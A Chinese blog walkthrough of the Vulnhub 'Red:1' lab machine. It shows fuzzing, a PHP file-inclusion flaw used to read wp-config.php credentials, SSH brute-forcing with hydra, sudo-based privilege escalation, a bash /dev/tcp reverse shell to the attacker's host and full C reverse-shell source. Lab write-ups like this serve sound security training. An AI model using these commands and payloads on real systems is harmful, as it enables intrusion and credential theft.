开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> 系统运维 -> 【Vulnhub靶场】Red:1 -> 正文阅读

[系统运维]【Vulnhub靶场】Red:1

前言

?0x00 记一次kali双网卡IP不显示问题

前言

Oracle VM VirtualBox需要和kali在同一网段
kali需要两个网卡
Oracle VM VirtualBox是选择host-only网卡

0x00 记一次kali双网卡IP不显示问题

添加网卡适配器

配置网卡编辑器

?开启网卡

网络配置中添加eth1网卡

?重启网络服务，已经获取到IP

环境介绍

靶机IP ： 192.168.56.101
kali攻击机IP： 192.168.56.102

一、信息收集

?0x00 nmap扫描

nmap 192.168.56.0/24

访问IP

?确定靶机位置

点击search会跳转到一个域名

0x01 修改hosts解析

使它正常访问

windows系统hosts文件位置

?kali的hosts文件位置在/etc/host.conf

?可正常访问

?0x02 寻找线索

?找一下Mr. Miessler

下载SecLists工具

?0x03 后门文件爆破

爆破后门文件
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -x .php -u http://redrocks.win/

?发现一个NetworkFileManagerPHP.php页面，进行访问，但是访问后发现是一片空白，说明确实存在这个页面，再根据状态码为500猜测这个页面可能存在LFI，使用wfuzz测试一下参数，字典也用github上面提供的字典文件

?0x04参数爆破

fuzz工具爆破参数

fuzz -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=ls

二、漏洞利用

0x00 文件包含利用

?验证后确实存在文件包含

?0x01 filter伪协议

用filter伪协议查看NetworkFileManagerPHP.php的代码

0x03 解码base64

PD9waHAKICAgJGZpbGUgPSAkX0dFVFsna2V5J107CiAgIGlmKGlzc2V0KCRmaWxlKSkKICAgewogICAgICAgaW5jbHVkZSgiJGZpbGUiKTsKICAgfQogICBlbHNlCiAgIHsKICAgICAgIGluY2x1ZGUoIk5ldHdvcmtGaWxlTWFuYWdlclBIUC5waHAiKTsKICAgfQogICAvKiBWR2hoZENCd1lYTnpkMjl5WkNCaGJHOXVaU0IzYjI0bmRDQm9aV3h3SUhsdmRTRWdTR0Z6YUdOaGRDQnpZWGx6SUhKMWJHVnpJR0Z5WlNCeWRXeGxjdz09ICovCj8+Cgo=

<?php
   $file = $_GET['key'];
   if(isset($file))
   {
       include("$file");
   }
   else
   {
       include("NetworkFileManagerPHP.php");
   }
   /* VGhhdCBwYXNzd29yZCBhbG9uZSB3b24ndCBoZWxwIHlvdSEgSGFzaGNhdCBzYXlzIHJ1bGVzIGFyZSBydWxlcw== */
?>

That password alone won't help you! Hashcat says rules are rules

仅凭密码对您没有帮助！ Hashcat 说规则就是规则?

试着获取wp-config.php，因为我自己搭建过wordpress,所以对配置文件比较熟。

?解码

PD9waHANCi8qKg0KICogVGhlIGJhc2UgY29uZmlndXJhdGlvbiBmb3IgV29yZFByZXNzDQogKg0KICogVGhlIHdwLWNvbmZpZy5waHAgY3JlYXRpb24gc2NyaXB0IHVzZXMgdGhpcyBmaWxlIGR1cmluZyB0aGUgaW5zdGFsbGF0aW9uLg0KICogWW91IGRvbid0IGhhdmUgdG8gdXNlIHRoZSB3ZWIgc2l0ZSwgeW91IGNhbiBjb3B5IHRoaXMgZmlsZSB0byAid3AtY29uZmlnLnBocCINCiAqIGFuZCBmaWxsIGluIHRoZSB2YWx1ZXMuDQogKg0KICogVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBmb2xsb3dpbmcgY29uZmlndXJhdGlvbnM6DQogKg0KICogKiBNeVNRTCBzZXR0aW5ncw0KICogKiBTZWNyZXQga2V5cw0KICogKiBEYXRhYmFzZSB0YWJsZSBwcmVmaXgNCiAqICogQUJTUEFUSA0KICoNCiAqIEBsaW5rIGh0dHBzOi8vd29yZHByZXNzLm9yZy9zdXBwb3J0L2FydGljbGUvZWRpdGluZy13cC1jb25maWctcGhwLw0KICoNCiAqIEBwYWNrYWdlIFdvcmRQcmVzcw0KICovDQovLyAqKiBNeVNRTCBzZXR0aW5ncyAtIFlvdSBjYW4gZ2V0IHRoaXMgaW5mbyBmcm9tIHlvdXIgd2ViIGhvc3QgKiogLy8NCi8qKiBUaGUgbmFtZSBvZiB0aGUgZGF0YWJhc2UgZm9yIFdvcmRQcmVzcyAqLw0KZGVmaW5lKCAnREJfTkFNRScsICd3b3JkcHJlc3MnICk7DQoNCi8qKiBNeVNRTCBkYXRhYmFzZSB1c2VybmFtZSAqLw0KZGVmaW5lKCAnREJfVVNFUicsICdqb2huJyApOw0KDQovKiogTXlTUUwgZGF0YWJhc2UgcGFzc3dvcmQgKi8NCmRlZmluZSggJ0RCX1BBU1NXT1JEJywgJ1Izdl9tNGx3aDNyM19rMW5HISEnICk7DQoNCi8qKiBNeVNRTCBob3N0bmFtZSAqLw0KZGVmaW5lKCAnREJfSE9TVCcsICdsb2NhbGhvc3QnICk7DQoNCi8qKiBEYXRhYmFzZSBDaGFyc2V0IHRvIHVzZSBpbiBjcmVhdGluZyBkYXRhYmFzZSB0YWJsZXMuICovDQpkZWZpbmUoICdEQl9DSEFSU0VUJywgJ3V0ZjgnICk7DQoNCi8qKiBUaGUgRGF0YWJhc2UgQ29sbGF0ZSB0eXBlLiBEb24ndCBjaGFuZ2UgdGhpcyBpZiBpbiBkb3VidC4gKi8NCmRlZmluZSggJ0RCX0NPTExBVEUnLCAnJyApOw0KDQpkZWZpbmUoJ0ZTX01FVEhPRCcsICdkaXJlY3QnKTsNCg0KZGVmaW5lKCdXUF9TSVRFVVJMJywgJ2h0dHA6Ly9yZWRyb2Nrcy53aW4nKTsNCmRlZmluZSgnV1BfSE9NRScsICdodHRwOi8vcmVkcm9ja3Mud2luJyk7DQoNCi8qKiNAKw0KICogQXV0aGVudGljYXRpb24gdW5pcXVlIGtleXMgYW5kIHNhbHRzLg0KICoNCiAqIENoYW5nZSB0aGVzZSB0byBkaWZmZXJlbnQgdW5pcXVlIHBocmFzZXMhIFlvdSBjYW4gZ2VuZXJhdGUgdGhlc2UgdXNpbmcNCiAqIHRoZSB7QGxpbmsgaHR0cHM6Ly9hcGkud29yZHByZXNzLm9yZy9zZWNyZXQta2V5LzEuMS9zYWx0LyBXb3JkUHJlc3Mub3JnIHNlY3JldC1rZXkgc2VydmljZX0uDQogKg0KICogWW91IGNhbiBjaGFuZ2UgdGhlc2UgYXQgYW55IHBvaW50IGluIHRpbWUgdG8gaW52YWxpZGF0ZSBhbGwgZXhpc3RpbmcgY29va2llcy4NCiAqIFRoaXMgd2lsbCBmb3JjZSBhbGwgdXNlcnMgdG8gaGF2ZSB0byBsb2cgaW4gYWdhaW4uDQogKg0KICogQHNpbmNlIDIuNi4wDQogKi8NCmRlZmluZSgnQVVUSF9LRVknLCAgICAgICAgICcydXVCdmM4U081ez5Vd1E8XjVWNVtVSEJ3JU59LUJ3V3F3fD48KkhmQndKKCAkJiUsKFpiZy9qd0ZrUkhmfnZ8Jyk7DQpkZWZpbmUoJ1NFQ1VSRV9BVVRIX0tFWScsICAnYWh9PElgNTJHTDZDXkB+eCBDOUZwTXEtKXR4Z09tQTx+e1I1a3RZL0AuXWRCRj9rZUIzfStZXnUhYTU0IFhjKCcpOw0KZGVmaW5lKCdMT0dHRURfSU5fS0VZJywgICAgJ1thIUt9RDw3LXZCM1kmeF88M2VdV2QrSl0hbytBOlVAUVVaLVJVMV10T0AvTn1ifVJAKy8kK3UqcEp8Wih4dS0nKTsNCmRlZmluZSgnTk9OQ0VfS0VZJywgICAgICAgICcgZzR8QH46aCxLMjlEfSRGTC1mL2V1ancoVlQ7OHdhN3hSV3BWUjogPn0sXSFFei40OEU6b2sgOElwfjVfbythJyk7DQpkZWZpbmUoJ0FVVEhfU0FMVCcsICAgICAgICAnYTssTzx+dmJwTCt8QFcrIVJzMW8sVCRyOShMd2FYSSA9STdaVyQuWlsrQlE9QjZRRzducit3X2JRNkJdNXE0YycpOw0KZGVmaW5lKCdTRUNVUkVfQVVUSF9TQUxUJywgJ0drVTolIExvfSA5fXczOGk6JV09dXEmSjZaJlJSI3YydnNCNWFfICsuW3VzOzZtRSt8JHgqKyBEKktlKzpOdDonKTsNCmRlZmluZSgnTE9HR0VEX0lOX1NBTFQnLCAgICcjYEY5JnBtX2pZfU4zeTAmOFpdRWVMKXosJDM5LHlGYyROcWBqR09NVF9hTSpgPCQ5QTo5PEtrXkx9ZlhAK2laJyk7DQpkZWZpbmUoJ05PTkNFX1NBTFQnLCAgICAgICAnaFRsRkUqNnpsWk1icWx1eiloZjotOngtOmw4OWZDNG90Y2k7Mzh8aWA3ZVUxOytrWyEwW1pHLm9DdDJALXkzWCcpOw0KDQovKiojQC0qLw0KDQovKioNCiAqIFdvcmRQcmVzcyBkYXRhYmFzZSB0YWJsZSBwcmVmaXguDQogKg0KICogWW91IGNhbiBoYXZlIG11bHRpcGxlIGluc3RhbGxhdGlvbnMgaW4gb25lIGRhdGFiYXNlIGlmIHlvdSBnaXZlIGVhY2gNCiAqIGEgdW5pcXVlIHByZWZpeC4gT25seSBudW1iZXJzLCBsZXR0ZXJzLCBhbmQgdW5kZXJzY29yZXMgcGxlYXNlIQ0KICovDQokdGFibGVfcHJlZml4ID0gJ3dwXyc7DQoNCi8qKg0KICogRm9yIGRldmVsb3BlcnM6IFdvcmRQcmVzcyBkZWJ1Z2dpbmcgbW9kZS4NCiAqDQogKiBDaGFuZ2UgdGhpcyB0byB0cnVlIHRvIGVuYWJsZSB0aGUgZGlzcGxheSBvZiBub3RpY2VzIGR1cmluZyBkZXZlbG9wbWVudC4NCiAqIEl0IGlzIHN0cm9uZ2x5IHJlY29tbWVuZGVkIHRoYXQgcGx1Z2luIGFuZCB0aGVtZSBkZXZlbG9wZXJzIHVzZSBXUF9ERUJVRw0KICogaW4gdGhlaXIgZGV2ZWxvcG1lbnQgZW52aXJvbm1lbnRzLg0KICoNCiAqIEZvciBpbmZvcm1hdGlvbiBvbiBvdGhlciBjb25zdGFudHMgdGhhdCBjYW4gYmUgdXNlZCBmb3IgZGVidWdnaW5nLA0KICogdmlzaXQgdGhlIGRvY3VtZW50YXRpb24uDQogKg0KICogQGxpbmsgaHR0cHM6Ly93b3JkcHJlc3Mub3JnL3N1cHBvcnQvYXJ0aWNsZS9kZWJ1Z2dpbmctaW4td29yZHByZXNzLw0KICovDQpkZWZpbmUoICdXUF9ERUJVRycsIGZhbHNlICk7DQoNCi8qIEFkZCBhbnkgY3VzdG9tIHZhbHVlcyBiZXR3ZWVuIHRoaXMgbGluZSBhbmQgdGhlICJzdG9wIGVkaXRpbmciIGxpbmUuICovDQoNCg0KDQovKiBUaGF0J3MgYWxsLCBzdG9wIGVkaXRpbmchIEhhcHB5IHB1Ymxpc2hpbmcuICovDQoNCi8qKiBBYnNvbHV0ZSBwYXRoIHRvIHRoZSBXb3JkUHJlc3MgZGlyZWN0b3J5LiAqLw0KaWYgKCAhIGRlZmluZWQoICdBQlNQQVRIJyApICkgew0KCWRlZmluZSggJ0FCU1BBVEgnLCBfX0RJUl9fIC4gJy8nICk7DQp9DQoNCi8qKiBTZXRzIHVwIFdvcmRQcmVzcyB2YXJzIGFuZCBpbmNsdWRlZCBmaWxlcy4gKi8NCnJlcXVpcmVfb25jZSBBQlNQQVRIIC4gJ3dwLXNldHRpbmdzLnBocCc7DQo=

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'john' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define('FS_METHOD', 'direct');

define('WP_SITEURL', 'http://redrocks.win');
define('WP_HOME', 'http://redrocks.win');

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         '2uuBvc8SO5{>UwQ<^5V5[UHBw%N}-BwWqw|><*HfBwJ( $&%,(Zbg/jwFkRHf~v|');
define('SECURE_AUTH_KEY',  'ah}<I`52GL6C^@~x C9FpMq-)txgOmA<~{R5ktY/@.]dBF?keB3}+Y^u!a54 Xc(');
define('LOGGED_IN_KEY',    '[a!K}D<7-vB3Y&x_<3e]Wd+J]!o+A:U@QUZ-RU1]tO@/N}b}R@+/$+u*pJ|Z(xu-');
define('NONCE_KEY',        ' g4|@~:h,K29D}$FL-f/eujw(VT;8wa7xRWpVR: >},]!Ez.48E:ok 8Ip~5_o+a');
define('AUTH_SALT',        'a;,O<~vbpL+|@W+!Rs1o,T$r9(LwaXI =I7ZW$.Z[+BQ=B6QG7nr+w_bQ6B]5q4c');
define('SECURE_AUTH_SALT', 'GkU:% Lo} 9}w38i:%]=uq&J6Z&RR#v2vsB5a_ +.[us;6mE+|$x*+ D*Ke+:Nt:');
define('LOGGED_IN_SALT',   '#`F9&pm_jY}N3y0&8Z]EeL)z,$39,yFc$Nq`jGOMT_aM*`<$9A:9<Kk^L}fX@+iZ');
define('NONCE_SALT',       'hTlFE*6zlZMbqluz)hf:-:x-:l89fC4otci;38|i`7eU1;+k[!0[ZG.oCt2@-y3X');

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

账号：john

密码：R3v_m4lwh3r3_k1nG!!

前边也说过这个密码没有用，要用hash规则

我的用不了没找到问题，待解

hashcat --stdout pass  -r /usr/share/hashcat/rules/best64.rule > pass2  --force

0x04 ssh爆破远程连接

hydra -l john -P pass ssh://192.168.56.101

?使用john:R3v_m4lwh3r3_k1nG!!6进行远程连接

三、权限提升

目录下有一个txt，

提示：

Having a little trouble with the cat command blue?

cat命令有问题

发现cat和vi命令互换。然后又断开连接。

重新连接失败，再次爆破发现密码更改

?sudo -l 查看可执行命令

发现会以 ippsec 用户执行 /usr/bin/time：

于是time提权，执行sudo -u ippsec /usr/bin/time /bin/bash切换到ippsec用户

几秒钟没有交互就会断开连接，还会将我们踢出连接并修改密码，于是进行会话维持。

四、会话维持

0x00 反弹shell

做反弹shell
sudo -u ippsec /usr/bin/time /bin/bash
bash -i >& /dev/tcp/192.168.56.102/4444 0>&1


kali监听
nc  -lvvp 4444

python3 -c 'import pty;pty.spawn("/bin/bash")'  #使用 python 的 pty 来转换为 交互式shell

export TERM=xterm #这里按下Ctrl+z返回一下

stty raw -echo;fg #输入reset

stty rows 46 columns 188 #规定行列，能使其顺序不乱

cd /var/www/wordpress

?这样就得到了一个完整的shell；

返回root目录

Come on now Blue! You really think it would be that easy to get the user flag? You are not even on the right user! Hahaha
来吧，蓝色!你真觉得能轻易拿到flag吗?您甚至没有使用正确的用户!哈哈哈

五、pspy64s监听?

发现一个问题，就是命令行上总是会不时的弹出一些消息，肯定是设置什么定时任务，下载pspy64s监听
spy是一种命令行工具，无需root权限即可监听进程。可查看其他用户执行的命令，cron作业等

https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s

?开启http服务

python3 -m http.server 8000

?执行pspy64s

?supersecretfileuc.c

发现是定时弹出的脚本，所以只需要上传一个提权的脚本将此脚本进行替换即可
先删除 /var/www/wordpress/.git/supersecretfileuc.c 和 rev 文件

0x00 反弹shell代码

写入由c语言编写的反弹shell代码

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void){
    int port = 9000;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;       
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("192.168.56.102");

    connect(sockt, (struct sockaddr *) &revsockaddr, 
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"sh", NULL};
    execve("/bin/bash", argv, NULL);

    return 0;       
}

稍作改动： execve(“sh”, argv, NULL); 改成 execve(“/bin/bash”, argv, NULL);